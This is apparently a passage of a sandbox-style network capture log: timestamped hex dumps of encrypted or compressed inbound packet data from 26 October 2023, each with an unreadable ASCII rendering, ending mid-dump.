                                      2023-10-26 07:03:21 UTC25INData Raw: 31 17 41 19 e7 83 bd e8 36 07 0e c4 57 64 51 06 db aa 08 53 d8 3f 1d 8d 59 dd 35 39 06 bf af 4e a9 ce 3d 96 70 9a 10 e3 6e cf e5 76 57 0b e6 22 44 3e 3c f4 68 00 d7 11 0d ce 15 ba fe 33 70 c6 d5 27 08 ea c5 1e 48 78 be a2 0a b0 15 c5 8b af e4 fd 11 d5 05 c5 da ff e2 1f 47 6b b2 9b e6 6f 89 9e a2 8f 95 1c 97 a3 69 d1 9b 65 46 08 6d a3 be 7e 15 a3 25 e7 a1 6b b9 59 1e a7 c8 c1 2e 8f be a9 7a 56 d7 86 ba 77 5c ad 7f 4b 27 76 a7 4c f8 10 4b ae a0 5d 0f 42 47 a3 56 7b 38 50 9f af 74 d7 61 a1 d0 f0 9a fe a4 7a 08 54 c4 f7 50 4c 97 a6 c6 30 42 8d 67 4f 2b ab f0 78 b8 9f 20 5a 31 aa d4 72 83 56 b6 f9 62 1e a4 58 35 cc 07 79 38 6c 4c fb d7 ba 7a 72 d9 69 33 ab d4 7e b1 bc 8f 8d bf 7a f2 f8 1d 11 74 5d 9e 10 7e 18 ae 8b bc 24 fe 38 11 2a 2e 7d 41 9f 0d a4 f7 3a d2
                                      Data Ascii: 1A6WdQS?Y59N=pnvW"D><h3p'HxGkoieFm~%kY.zVw\K'vLK]BGV{8PtazTPL0BgO+x Z1rVbX5y8lLzri3~zt]~$8*.}A:
                                      2023-10-26 07:03:21 UTC27INData Raw: b3 02 c4 5b 47 6b 88 70 7d 2d eb d2 a3 f4 9c b0 70 46 e9 b2 6a 7c 90 5b ab 87 e0 e4 4a ce 3f 90 a0 51 28 55 a7 19 ab 61 eb 93 79 3a 91 7b 53 0b 5a fe e8 5e e3 6f 72 f7 3b b6 a6 9b 47 4e 19 33 77 d6 71 96 e4 8c d5 4c ee 81 47 4e 2f 5d 4a a1 2f 7f f8 b1 8f 42 fb 71 b5 9f de 46 11 90 88 13 2f 12 19 e1 a9 84 80 36 07 30 83 55 64 51 26 23 a4 08 53 26 cf 13 8d 59 03 3b 3b 06 9f 50 4f 90 d6 c3 97 49 73 19 e3 6e 4a 89 76 57 27 c1 17 44 38 47 a4 48 03 d3 31 0f 30 1b ba 00 3d 8c ca d5 d9 24 e8 c5 3e 48 86 bf 9b fe b1 2c cf 8b 8f e5 fd 31 d4 fb cb da 01 ec e3 4b 6b 4c b7 e7 6f a9 99 5c 8e ac e7 96 9a 6c e9 9e 65 7e 0d 55 cc 41 b9 53 77 d1 28 b7 41 c2 4a 2e a3 c9 ef 2c 9e 9e a7 7a 56 c6 58 b4 77 5c 95 b0 45 25 76 9f a8 f6 10 4b 8e 5e 51 0d 42 99 a0 6f 71 38 ae 9e 96
                                      Data Ascii: [Gkp}-pFj|[J?Q(Uay:{SZ^or;GN3wqLGN/]J/BqF/60UdQ&#S&Y;;POIsnJvW'D8GH10=$>H,1KkLo\le~UASw(AJ.,zVXw\E%vK^QBoq8
                                      2023-10-26 07:03:21 UTC28INData Raw: 67 52 53 b4 55 7b 18 64 a3 1f 8a 18 78 91 d7 c6 33 0d e9 fd 3f 6a 90 4c 1f 20 dd 6a 85 98 90 31 5a 1b 6b b8 08 e9 b4 12 39 86 4e 6e 37 4a 97 84 97 4b 5c 1d c1 f6 c2 3d 6f fb 39 d3 6e 63 58 74 52 0e 31 0d 51 ec 6e fc 54 91 95 df 71 05 56 2d 2c d2 08 1a 43 c5 8d 47 73 e8 79 7f 8e 6e 53 c4 fc cd 5f 67 25 ff 70 7d d7 cd c7 a3 f4 64 9a 50 45 c9 86 6a 82 9e a7 aa be 3c e8 48 ce e1 9f a0 51 0d d0 d5 20 b8 65 99 ad 83 36 e0 53 27 23 5a f4 9f 07 c3 68 76 d7 0e 48 a8 99 b9 40 e7 3f 75 28 5d 93 e4 ac e2 b2 ef b8 90 4f 16 7f b4 a8 2f 81 8a c7 8f 67 84 fc b9 9e da ca 49 94 88 4b 17 09 19 e7 83 f9 f3 36 07 0a c4 6d 64 51 06 db aa 08 53 d8 3f 1d 8d 59 dd 2f 39 06 bf af 4e a9 c1 3d 96 70 9a 10 e2 6e 94 a6 76 57 0f 8e 9e 4b 3e 3a f2 51 03 d7 11 f3 3e 1b ba fe cd 82 ca d5
                                      Data Ascii: gRSU{dx3?jL j1Zk9Nn7JK\=o9ncXtR1QnTqV-,CGsynS_g%p}dPEj<HQ e6S'#ZhvH@?u(]O/gIK6mdQS?Y/9N=pnvWK>:Q>
                                      2023-10-26 07:03:21 UTC29INData Raw: e2 ab 05 c1 17 08 25 0b e2 fa c6 98 b9 d0 ef e8 25 e8 87 18 a5 25 5b 69 ff 02 ff 52 8d 8b c4 fa d9 0a 23 78 2f c6 06 f2 41 da 08 e4 d3 8a ee 27 5f 33 c0 bd a8 27 32 6a 98 f6 54 b7 32 88 09 65 49 84 9d e9 2f 91 d2 27 af 3f ee 04 15 a5 2f fd 4b a2 84 0b 17 f2 b0 17 26 1f 11 d6 64 34 ae b1 15 6a a3 53 5b 18 9a aa 1e 74 39 33 6f de c7 73 e3 fb fd 3f 4a 78 4d 3f 20 23 64 85 66 91 90 a8 12 6a 98 4f 4d b4 12 c7 79 76 44 37 4a 97 ae 49 22 03 e3 c8 09 cc 1d ca fb c7 df 90 62 58 45 52 0e 31 0d 51 8a 75 ec a8 6e 94 f6 15 05 73 56 a1 dc 08 1e 31 11 85 47 03 e0 57 7f 8e 64 d0 b6 c5 c7 5b 47 17 d5 50 4b 29 c3 c7 5d fa 9a 96 50 bb e5 b2 6a a2 be 59 ab 87 e0 e9 71 c4 1f 96 a0 7b 08 8a a6 20 b8 9f e5 93 87 36 6e 77 3c 23 7a 9b e2 74 c3 96 73 ce 19 48 a8 99 b9 47 e7 3f 50
                                      Data Ascii: %%%[iR#x/A'_3'2jT2eI/'?/K&d4jS[t93os?JxM? #dfjOMyvD7JI"bXER1QunsV1GWd[GPK)]PjYq{ 6nw<#ztsHG?P
                                      2023-10-26 07:03:21 UTC30INData Raw: 7e 1c 2d 7f 28 f9 fb 0b 6f 98 1e bf b2 86 2c 6b 9c cc 6e c0 35 48 f7 a6 c6 dd 74 80 59 b2 8c 4a 40 b7 87 ef bf 31 e6 a4 7e 19 ef 64 bf c7 7f 26 e6 40 da 93 9b 7d 39 1c 1b fb 4f 21 35 67 5c 71 0d 44 d0 16 7a 20 5b ea 44 ef 54 ca 69 71 47 b0 9a cc 7d 0c 06 e0 5c 00 47 bf 0e 13 f1 9b 8d ef d9 b1 e0 6c 0b 0d 10 e6 88 e2 e0 ca a0 c7 f7 05 ce 8d 65 d6 db 55 6d df 46 01 5e 8d 75 ea 9a d9 0a dd 8a 2e ff 31 a0 41 da f6 13 d3 b3 ec 07 5f 33 3e f4 b2 27 17 11 cb 97 54 b3 40 4e 02 65 39 ac 78 e5 2f 9b 8f 37 af 3f ea da 47 9c 4e fd b5 ac 7a 02 17 0c 94 50 26 3f 49 28 6d 34 50 98 6a 48 a3 55 7b e6 93 aa 1e af 43 1f 91 d7 c2 01 81 ec fd 4f 62 9d 4c 1f 2a 5e 17 85 98 94 ef 09 1b 6b 98 91 e7 b4 12 c7 79 7b 64 37 6a c7 ae b7 23 a2 1c f8 02 cc 3d 6f d1 e7 8e 6e 63 78 bb 5c
                                      Data Ascii: ~-(o,kn5HtYJ@1~d&@}9O!5g\qDz [DTiqG}\GleUmF^u.1A_3>'T@Ne9x/7?GNzP&?I(m4PjHU{CObL*^ky{d7j#=oncx\
                                      2023-10-26 07:03:21 UTC32INData Raw: 4b 66 03 21 ca 8b f7 51 8a 9d e0 c5 d2 a4 03 48 37 a8 e4 a1 4e d3 98 d4 8d 1a 29 5b 62 d3 90 43 a8 6f b4 46 4a 0b c9 33 9a ea 0a 5b 18 f3 36 95 08 89 a3 08 24 10 0d eb a5 36 ed 1f a0 fb ae 18 30 73 bf bc 20 d8 b1 bf 15 23 8c 81 3f ca cf 36 42 a9 b1 48 64 89 47 71 bd 30 28 bb 4d e9 33 7e 1c d9 0b 5b f9 d3 49 4f df 18 41 bb 79 22 4b ef cc 90 cc cb 49 88 9b 34 d8 74 7e 78 81 ae 4a 40 49 77 e6 bf 31 3d d3 0d 19 cf 4a cd 03 7a d8 97 51 d6 93 9b 77 ba 66 1a fb 6b 25 30 67 5c 31 39 49 d0 16 5a f5 57 ea 44 31 0f ca 69 71 47 bd a3 ee 5d 4f 06 1e 55 fe 46 a3 57 60 f1 9b 77 94 0b b4 c5 67 50 16 10 e2 f0 b1 96 ca d0 eb cc 53 ce 87 18 5b d5 55 69 ff fc 0d 5e 8d ab dd 9a d9 0a dd 87 17 e8 11 f2 41 24 ff ec d2 aa c3 07 5f 33 80 f5 4a d8 cd 4a 82 97 54 b7 cc 78 07 65 49
                                      Data Ascii: Kf!QH7N)[bCoFJ3[6$60s #?6BHdGq0(M3~[IOAy"KI4t~xJ@Iw1=JzQwfk%0g\19IZWD1iqG]OUFW`wgPS[Ui^A$_3JJTxeI
                                      2023-10-26 07:03:21 UTC33INData Raw: 29 d7 b8 c4 c8 11 7e 60 f7 b6 d5 d6 b0 a0 45 3c 1e 5d 78 78 71 23 5d 87 2b 30 7c 84 af 55 bd 3f 1c e4 d5 62 2e 45 99 68 07 9e 49 99 61 61 a6 91 8a 5d 31 ca dc f0 31 ec 58 33 f3 ae 53 ed 2f 07 f0 25 d8 5c 71 58 35 b3 f5 69 1e b6 0d f5 5e 78 76 b1 e9 f3 37 f7 f8 19 8b 0a 28 50 94 be 7b 72 6c 23 4e ca 8b d7 ae 8b a4 cf 3b dc a7 fd 41 c9 a4 c2 da 1d d8 98 d0 73 ed 28 62 99 da 91 43 b8 3a b4 46 4c 5c 8e cd 65 1f dc 49 18 f3 47 9c 7b 89 a7 29 fa 6e 0f eb 5b c5 e2 1f 88 a6 50 14 3a 8d 96 fa 20 fd ca 32 14 1a aa f3 25 cc 31 4f bc a5 94 33 65 2c 46 75 bf a2 3a bb 3d cb 55 0d 1c d3 72 f5 ea d3 4d 6f 66 14 40 bb be 25 4b ef cc 90 cc c9 49 80 c1 34 d8 7e 5c 53 b8 8d 5a 40 49 8b ef 56 30 26 8f 7c 0a cf 4e bf c7 7c e8 e4 79 81 93 9b 7d c7 15 1a fb 6d 76 63 67 5c 3b ba
                                      Data Ascii: )~`E<]xxq#]+0|U?b.EhIaa]11X3S/%\qX5i^xv7(P{rl#N;As(bC:FL\eIG{)n[P: 2%1O3e,Fu:=UrMof@%KI4~\SZ@IV0&|N|y}mvcg\;
                                      2023-10-26 07:03:21 UTC34INData Raw: a2 fb 4e a7 f1 3b 66 12 61 35 8f 97 18 bf b3 46 29 06 8c 1e 88 a0 a1 53 36 32 4d ff 39 cb 29 66 cd 4d 46 37 bb ae 54 44 30 be 3e c3 ec 26 d3 5c 32 13 4f 5e c8 f5 92 0e 5a 53 aa 43 78 84 6c e0 4e bb c6 7c 8b c2 a7 f2 45 45 0a e5 4e b6 5b dd 58 7f 8c a1 c6 63 e0 cd ad 2c 71 d9 46 8b 7e 2a d7 b8 c4 ca 11 7e 40 0a ba d6 d6 6e a2 7c 23 1e a3 79 bf 77 22 5d 79 08 11 78 ac e1 55 43 3b 6b fe d5 9c 20 b8 97 4a 0f be 4d 99 9f 60 61 bf 89 5d 31 ca d9 f3 31 b7 20 33 f3 aa 53 e0 16 11 d8 44 d8 a2 72 61 a5 c8 8b 69 3e bb f3 fb 5e 86 58 b0 e9 f3 c9 05 f5 1a ab 0a d6 5c 97 40 5a 49 66 23 4e 34 8a ce be 8b a4 cf 3b de a4 fd bf 39 a9 c1 fa 3e d3 98 d0 8d 1d 2a 5b 9c 24 9d 40 80 1f b4 46 4c 64 55 32 a3 ea 22 40 18 f3 1c e9 7b 89 a3 f2 0a 63 0d eb 5b c4 e0 1f 80 fd 50 14 30
                                      Data Ascii: N;fa5F)S62M9)fMF7TD0>&\2O^ZSCxlN|EEN[Xc,qF~*~@n|#yw"]yxUC;k JM`a]11 3SDrai>^X\@ZIf#N4;9>*[$@FLdU2"@{c[P0
                                      2023-10-26 07:03:21 UTC35INData Raw: c5 8a c1 88 44 15 9e d2 90 dc 23 67 22 69 4b fd e5 fa 8b b1 30 a4 aa 60 4d 01 05 b3 5f 63 0a e6 bf 5c 1d 62 aa f1 3c e2 af e2 cb 23 0e 70 cc 48 7b 48 e1 0b e8 63 60 f3 37 9c de 25 32 91 b3 f9 7f c3 45 f9 30 75 e3 4b 3c 03 d6 55 85 3e 42 e5 a8 bf c6 8a d1 2f 54 04 16 89 ec 57 c4 9a d3 82 dd 4b a6 f1 c5 67 d5 7a 36 8f b7 e2 b3 b3 46 a4 db b5 3d 8e cf cb ac 3f 34 6d 9c 47 cb 29 9c 3d 40 44 37 bb ae 54 44 38 aa 3e c3 c7 26 dc 65 25 33 4a 5e 36 f9 6c 00 2a d8 aa bd 72 e8 06 c1 4b bd e6 6d 75 c3 9e 1a 4b 44 0a 1b bc ba 5a 23 74 6b 8c e1 b7 9d e1 f4 9a 2a 71 d9 b8 79 70 29 a4 b1 3b c6 14 11 0a 08 ba d0 f6 86 a3 45 3c e0 ad 78 41 7b dd 51 86 01 30 72 84 af 55 bd 30 26 f3 d5 9c 22 b8 95 48 0f ed dd 99 9f 66 f0 db 8b 5d 37 14 de f0 31 97 df 3d f2 aa ad 1f 23 06 d8
                                      Data Ascii: D#g"iK0`M_c\b<#pH{Hc`7%2E0uK<U>B/TWKgz6F=?4mG)=@D7TD8>&e%3J^6l*rKmuKDZ#tk*qyp);E<xA{Q0rU0&"Hf]71=#
                                      2023-10-26 07:03:21 UTC36INData Raw: c1 0f 0e 69 8c 4d 47 2a 65 2a d3 29 3d 9b 92 5a 62 a0 d8 ef ce 89 dc 03 c3 0b 47 3b 29 af ae 47 79 67 09 c4 ca 82 59 1b c9 49 4c c2 5b 55 de 02 17 6b d3 7e c7 f1 e5 a7 67 7c 62 39 9c b3 2f 89 a7 d5 d7 b4 ba 2e 8d 3c bd aa 8f 25 fc d1 2f 76 03 7a db 7b 4c 39 de ef 08 cf 04 09 1d 3c 83 e5 aa cb 54 6e eb 90 d3 91 cc dd 6b 21 69 2f e9 eb a8 8b 45 31 9d bd 60 5e 31 f9 bf ac 65 79 e5 ad 5c 1b 1c e0 f0 3c e4 8f 09 c5 22 0e b6 14 4f 7b 48 1f f9 e5 62 40 f4 2b 9c de db cd a9 9d ee 7f c3 bb 0b 3c 75 90 91 ef 03 d0 3c 80 55 43 e3 8e b7 db 8a d1 d1 a4 0b 17 89 12 a5 c9 9b f3 88 c3 4b a6 0f 3a 5f fb 6d 36 8f 49 10 bf b3 35 c9 06 b5 3b e7 ca a0 ad 39 12 66 83 47 cb d7 6c 32 41 44 c9 49 a3 55 64 03 ba 3e c3 39 d9 e4 4b 32 33 4a a0 c4 f5 6c 73 94 53 aa bb 1b ed 6d c0 4d
                                      Data Ascii: iMG*e*)=ZbG;)GygYIL[Uk~g|b9/.<%/vz{L9<Tnk!i/E1`^1ey\<"O{Hb@+<u<UCK:_m6I5;9fGl2ADIUd>9K23JlsSmM
                                      2023-10-26 07:03:21 UTC38INData Raw: 3d ec 60 ab aa 35 ff 87 ca f7 dc bd a0 58 24 a5 a8 c1 42 de c3 47 8b dc 89 0a 6c 24 1c 90 c6 fe e1 52 33 f8 13 b3 5c 38 da 9b 8c 56 ce 95 61 9a 9f 3f 3f 7f f3 ba 18 36 0b 11 c4 d7 d3 05 80 15 99 b6 97 0c 91 34 57 a5 ca 7b ab 97 96 a1 fb c4 7f 21 aa 48 db 39 19 6e cd 8a 07 bb d9 f1 64 c1 0f 0e 6e 8c 16 bc 2a 65 26 85 4e 3c 9b 94 84 62 a0 d8 11 3e a3 dd de ab f0 4b 3a d7 83 a7 47 87 69 ff c5 80 e8 59 1b c3 49 4e e1 5b d8 23 21 17 1f d0 12 c6 81 90 f9 77 7c 68 4b d4 bb 2e f9 c8 54 db b5 b0 f0 9e 1f bd d8 af 22 c5 b6 5c 08 03 84 dd 09 64 4d 3d 9f 67 b6 6b 63 16 c2 89 e6 8a b9 3c 69 15 ee a1 ef cc 23 6d 52 db 08 fd 9b c7 f4 bb 30 ae 54 6c 7d 31 75 49 ab 65 7a 95 d2 5c 1d 79 f8 b5 34 e2 df 73 ba 22 0e 42 e4 42 58 48 93 91 ec 62 10 a0 55 9c de 2f be 3e 82 ee 0f
                                      Data Ascii: =`5X$BGl$R3\8Va??64W{!H9ndn*e&N<b>K:GiYIN[#!w|hK.T"\dM=gkc<i#mR0Tl}1uIez\y4s"BBXHbU/>
                                      2023-10-26 07:03:21 UTC39INData Raw: 6b 92 a0 b4 3e 41 39 a8 c1 2b 9e 3e 4e 54 05 75 59 97 de 7f 8f 46 18 77 d9 f8 d1 5b 37 51 3b 64 86 fc 27 ef 69 f3 95 07 8e a4 2a 67 7d f3 da 95 b1 d3 b7 03 fb 19 e9 88 89 42 0b c6 62 3d 3e ce 76 d3 9d 8f 03 ca a6 5a db 29 37 e3 1d 71 b8 a9 5b e1 4d 86 46 48 49 13 2f 7a 69 11 ad b0 08 c5 e0 71 ab 6b 18 f1 87 f4 24 2d 41 5f 86 2a af a8 e1 7c cd c3 47 d3 f2 8c 00 6c d8 38 da c6 00 e7 a9 3d dc 12 8b 52 38 83 a5 59 a6 31 6a be b4 df 3f 3f 53 d0 b4 1c 36 2b ef c8 d7 d3 d1 ae 13 99 c8 db f2 9f 18 a9 ab 32 77 ad 97 b6 a0 fb 3a 72 da ab 8f c4 3f 19 46 a0 fe 07 bd 2d 01 6d c1 f1 22 6b 8c 3e d9 d4 6b 0a bc 43 c2 97 b2 7a 4e a0 d8 ef 30 79 dc 3a c9 f5 4b 3a 29 af a0 47 79 67 09 cb d5 95 59 e5 c5 91 40 e2 58 26 2f 02 e9 6c 85 11 c6 f1 e3 bf 72 7c 62 39 5a 62 d7 76 58
                                      Data Ascii: k>A9+>NTuYFw[7Q;d'i*g}Bb=>vZ)7q[MFHI/ziqk$-A_*|Gl8=R8Y1j??S6+2w:r?F-m"k>kCzN0y:K:)GygY@X&/lr|b9ZbvX
                                      2023-10-26 07:03:21 UTC40INData Raw: 79 c6 68 60 a8 f7 bc 70 4b d6 97 3d ad 2a 77 4f b0 f2 e8 9f 7c f6 d0 28 ef 75 62 b6 cd 74 18 96 24 bd d2 01 18 3e 7e 2e 7d b5 4d 21 a4 f6 d4 de 10 c4 74 44 b3 2d 74 2f 5d 39 07 eb b9 3e f4 a6 1c 3c 52 08 3c 40 89 a2 76 b7 6d c2 30 f0 33 32 21 8b d3 ae 85 f2 1e bc f3 84 30 7e 6d 46 ac 07 93 5e be c4 4f 3b a9 3f 27 bc 66 4e 56 1e 75 16 eb df 7f 89 46 1a 53 d9 06 23 77 31 3e 6a 64 86 fa d9 1d 4a ca 7d 0b af a4 bb 1d 7d f3 f4 76 bd f1 bd 8f a9 1f e9 d8 e4 2d 0a c6 9a cd 34 ec 76 42 17 89 03 e0 7b 5c db 29 c9 c4 f9 7b b8 a9 5b 1f 61 96 46 68 48 ed 21 7c 31 ef 5d ad 0e 3b cc 6a ab 95 14 01 86 f3 0c d0 be a0 40 23 a5 a8 c1 45 00 3e b8 74 f2 8e 0b 6c 0c 34 d0 d5 ce ee ac fa fc 13 8b 4b 38 da 8a 7c 5a ce 95 63 4c d1 3d 3f 4d 99 b4 1c 36 2b ef c8 d5 d3 db 8f 10 99
                                      Data Ascii: yh`pK=*wO|(ubt$>~.}M!tD-t/]9><R<@vm032!0~mF^O;?'fNVuFS#w1>jdJ}}v-4vB{\){[aFhH!|1];j@#E>tl4K8|ZcL=?M6+
                                      2023-10-26 07:03:21 UTC41INData Raw: 44 81 ea 89 d0 d6 9a 4c c2 59 1e 87 d3 c1 2e 9e b6 2e 7a 56 dd 0a cc 7a 5c e5 66 50 27 76 ad 9a 6e 10 4b 84 99 89 0f 42 b9 82 69 71 38 50 61 a1 5b d6 61 5f dc 01 94 de a6 7a f6 58 3a f6 49 5f 97 a6 c6 bd 37 b4 62 45 d5 a5 c9 7d 98 9c 20 62 fb ab 25 82 7d 5f 48 f5 16 7b 84 5b 31 b2 4b 87 39 5f 43 a8 d7 ba 50 57 d6 69 33 83 ad 77 b1 b6 86 90 b2 7a 86 f8 33 11 74 51 90 57 74 18 a4 b2 c5 d2 01 c7 19 7a 2e 7d 4b bd 29 ab f6 2a 2c 1a cb 54 66 b2 2d 74 d1 a2 01 2c f9 b9 3e 87 a1 87 3c 58 fc cc 4f 89 82 55 b5 6d c2 ce 00 3b 3d 21 75 21 a4 8a d2 36 b8 f3 84 ce 81 55 68 87 07 93 a0 4c cc 4f 1b 88 23 27 bc 3e 98 df 1a 75 3c 90 a7 72 89 c8 3c 4e d9 06 d7 53 ab 3e 4a 6f e9 67 d9 e3 41 d3 6e 0b af a4 bb 1a 73 f3 dc 95 b1 fe b7 51 a0 1f e9 f8 18 2c 33 d0 64 c3 32 12 7a
                                      Data Ascii: DLY..zVz\fP'vnKBiq8Pa[a_zX:I_7bE} b%}_H{[1K9_CPWi3wz3tQWtz.}K)*,Tf-t,><XOUm;=!u!6UhLO#'>u<r<NS>JogAnsQ,3d2z
                                      2023-10-26 07:03:21 UTC43INData Raw: a4 08 53 26 c0 28 9a 59 fd 37 c7 0a b2 51 6f 91 d6 3d 96 28 9a 17 ee 6e 94 8c 76 57 0f 30 19 54 3e 3a 2c 44 13 d7 31 00 30 1b ba 00 32 b7 d8 d5 27 28 99 b1 1e 48 8c 41 95 03 b0 35 cb 8b 8f e5 03 1f c5 fb cb 24 f3 f2 e1 6b 6a b2 bb e5 91 88 a7 7d 8e ac 19 b7 bf 69 e9 9e 4d c1 08 55 c6 33 b5 e4 89 5e ff 92 6b c2 53 e0 a9 c9 c1 0e 9c 9e a9 7a a8 d9 68 b4 77 a2 99 5e 4b 07 73 a7 b2 f4 ee 4a b7 b6 5d 0f 42 47 ae 6f 71 10 f0 9f af 5e 28 6f ad d0 2e 92 fe a4 7a 08 56 d4 f7 70 b3 9b b6 c6 ee 40 b4 62 4f d5 aa f1 5d b8 9f 20 9c f7 54 2b 73 71 5f b6 8b 75 75 a4 28 19 a9 4b 79 32 09 c1 a8 d7 b0 50 4f d6 69 33 55 24 67 b1 bc 0a e4 af 7a d6 dc 28 11 74 a5 b9 f4 6c 18 ae 8b bc 21 f3 38 c7 72 22 7d c5 2a 18 51 08 d5 2d 36 c9 54 46 b3 d3 7a c1 5c 00 eb e7 a9 3e a7 c3 1c
                                      Data Ascii: S&(Y7Qo=(nvW0T>:,D102'(HA5$kj}iMU3^kSzhw^KsJ]BGoq^(o.zVp@bO] T+sq_uu(Ky2POi3U$gz(tl!8r"}*Q-6TFz\>
                                      2023-10-26 07:03:21 UTC44INData Raw: bb e5 bf 6a 7c 92 57 ab 1d e0 e6 4d ce e1 9a a4 51 d6 a7 a3 20 ca ff e4 93 f7 1e 8b 7b 3c 29 35 52 e2 74 c9 96 7c f1 3b b6 a4 9f 47 21 4a 3f 75 dc af 9d eb 8c f5 b2 ef b8 6e b0 21 4d b4 90 d4 7e 83 c7 71 4e f0 8f 47 92 ce b8 87 6e 86 3c 3f ec 15 e1 89 7a 8c 31 07 61 48 55 64 5b f8 2b ac 08 ad d4 c9 11 ff 73 f2 37 49 69 11 51 4f 9a c2 c3 97 50 64 19 e3 6e 4a 81 88 5b 07 ce 65 06 31 3a a2 27 ad d7 11 07 24 e5 bb de 33 8e ca d5 d9 29 8a fc 9f 49 86 bf 65 0c b1 15 3b 85 9e e5 dd 11 d5 fb cb 24 f1 f0 e1 73 05 b2 bb e5 91 85 8f 5c 70 a0 0b 97 39 97 e7 97 65 b8 04 5d cc bf 8d e3 89 41 79 a3 6b c8 60 5f a7 c9 c1 d0 92 96 a9 84 5a de 78 db d9 5c 95 44 3f 2d 76 a7 a9 0a 1e 41 8e 5e 51 05 42 37 cb 4f 70 38 50 9f 91 4f d6 61 a1 f8 3b 94 fe ae 84 fa 52 c4 09 7c 4f 97
                                      Data Ascii: j|WMQ {<)5Rt|;G!J?un!M~qNGn<?z1aHUd[+s7IiQOPdnJ[e1:'$3)Ie;$s\p9e]Ayk`_Zx\D?-vA^QB7Op8POa;R|O
                                      2023-10-26 07:03:21 UTC45INData Raw: 3d e5 fc 3f 38 c2 5c 1f 50 4c ca 85 98 9a bb 63 1b 6b 99 91 e7 b6 12 39 8b 75 64 1f 16 97 ae bd 1a 51 1d c1 08 32 31 6f fb 39 d1 66 63 a5 6d 53 0e 31 0d 5c d7 4c dc 55 91 6b d6 fc 45 73 56 5e 2c 06 17 31 11 85 4e 03 e0 62 7f 8e 64 0e 97 fc cd 5b da e9 f3 79 7d 46 71 c7 a3 fe 64 98 53 45 17 be 69 82 be 5b ab 87 1e 72 b6 c0 1b 96 80 a5 29 ab a6 53 e7 61 eb 99 79 38 95 7b 4e 77 4a fe 92 06 a5 78 72 87 49 73 aa 99 37 b0 eb 3a 75 28 5d 96 e4 e3 66 b2 ef b2 90 42 2b 5d 9c b0 2f 7f 85 e1 af b6 fe 8f b9 ed 81 b8 1d 9a 76 35 39 12 6b b3 99 84 f0 44 8f 1e e4 25 16 6a 04 25 d4 f6 5f de c1 ef 81 5f fd 58 8a 06 bf 5b b1 9c d2 3d be 68 64 19 e5 48 4a 8c 76 57 7c a2 16 44 38 c4 dc 4f 03 29 1d 0a 30 69 1e ee 33 fe a5 a0 26 28 ec 3b 12 4f 86 41 92 00 b0 3d 54 8b 8f e3 92
                                      Data Ascii: =?8\PLck9udQ21o9fcmS1\LUkEsV^,1Nbd[y}FqdSEi[r)Say8{NwJxrIs7:u(]fB+]/v59kD%j%__X[=hdHJvW|D8O)0i3&(;OA=T
                                      2023-10-26 07:03:21 UTC46INData Raw: 30 89 00 a5 db ab 65 e7 02 21 5d 8d 8b e4 64 d8 33 34 86 2e ff ef fe 40 da de 77 d2 8a c4 3e 13 33 c0 fd 92 23 32 6a b8 69 5a af 32 76 f9 69 51 84 43 e1 2f 91 f2 ba ae 06 cf fa 14 9c b0 f1 4a a2 08 9c 06 f2 e8 78 3d 1f 17 22 45 28 ae 99 59 50 22 55 7b 18 ba af 1e 8a 38 92 9f cf c6 73 3d e5 e5 3f 6a 83 4c 1f 20 dd 65 bc 96 90 cf 56 e5 67 98 6f c3 94 14 c7 87 77 9a 39 52 97 ae 49 2f 44 1d e1 09 cc 3d 6f 05 c6 e6 7c 63 78 45 21 7a 31 f3 5a 2b 42 fc 54 b1 69 d6 71 05 8d 58 47 d2 08 e0 3d f7 89 67 03 c0 62 7f 70 65 17 bd fc cd 5b 47 37 fe 70 7d 29 3d c9 bb f4 9a 68 5c 5d e9 92 6c 82 9e 59 55 86 27 ed 48 ce 1f ae a5 51 28 ab 9e dc 46 9e 14 6d 8b 37 90 09 a2 32 5a 8e ca 6f c3 68 78 df 26 48 a8 93 b9 40 e5 3f 07 66 40 93 94 72 db b1 ef ca ac 5f 2f 2d c7 1c 2f 7f
                                      Data Ascii: 0e!]d34.@w>3#2jiZ2viQC/Jx="E(YP"U{8s=?jL eVgow9RI/D=o|cxE!z1Z+BTiqXG=gbpe[G7p})=h\]lYU'HQ(Fm72Zohx&H@?f@r_/-/
                                      2023-10-26 07:03:21 UTC47INData Raw: ce 6e c0 cb b7 a6 98 34 d8 8a 8c 7e b8 ac 4a 40 49 89 11 be 08 12 a8 7e 19 cf 6e be c7 7f d8 19 77 ca 93 9b 83 cb 12 1a db 6c 05 35 67 a2 30 fe 42 d0 16 5a 33 5e ea 44 11 62 4a 96 8e 46 cf 56 cc 5d 45 f8 ee 58 fe b8 8a 28 13 d1 9a 73 e6 d9 de 08 17 78 07 ee ee fe cc c5 cb d0 ef ec 6a 00 87 18 af 25 59 6d ff fc 0f 5f 8d 75 e8 9b d9 f4 2a 87 2e 01 1d f2 41 b5 39 ed d2 80 30 09 5d 33 e8 c8 b2 27 38 94 b4 95 54 49 3b 76 07 45 49 84 63 e5 d1 98 f2 44 21 56 81 2a 14 9c 44 92 7d a2 7a 08 e9 fc 9b 50 d8 13 14 28 4d 24 ae 99 53 05 72 55 7b 12 64 a4 1b 8a e5 67 91 d7 c6 55 d7 17 f3 3a 4a 5b 4c 1f 20 23 9a 89 9d 90 e5 56 1b 6b 99 7f e9 b4 12 c7 09 77 1b 3a 4b 9c af b7 23 5d 0e f1 0a cc 99 6f fb c7 fb 6e 63 69 65 52 0e 31 f3 ae db 4d fc 6c 12 6b d6 71 05 8d 5a 5e d2
                                      Data Ascii: n4~J@I~nwl5g0BZ3^DbJFV]EX(sxj%Ym_u*.A90]3'8TI;vEIcD!V*D}zP(M$SrU{dgU:J[L #Vkw:K#]oncieR1MlkqZ^
                                      2023-10-26 07:03:21 UTC49INData Raw: 8e c1 da 2c f3 98 d0 73 13 d7 55 9e da a9 17 80 3f b4 46 b2 68 a9 33 ba e1 22 40 18 0d 3d d1 69 89 a3 0c 77 14 0d eb af 36 ed 1f a0 db 52 14 30 73 61 f4 22 d8 b1 bf 18 18 ae a1 3f ca 31 3f bc a8 ad 39 17 89 47 75 ef 8b 2d bb 3d 3f 26 7c 1c d3 88 24 fb d3 6d 6d 98 18 41 45 86 15 4e ef cc 6e f8 ce 49 a8 9f 0c 7f 8b 7f 86 46 85 4a 40 61 2f ef bf 37 e6 a6 7f 19 31 42 be c7 46 d5 e7 79 cd 6d 97 7d c7 eb 16 fa 6f 6a b3 67 5c 3b 1a 41 d0 16 5a 2d 86 ea 44 11 5a 34 65 71 b9 96 9a cc 5c 5f 06 e0 5c fe 21 86 04 9c f1 9d 72 e6 d9 b0 d6 27 7d 0d 39 e0 fa cc c2 ca d0 fe cc 05 ce 87 18 5b d5 5f 69 c7 16 03 5e 8d 8b 1a 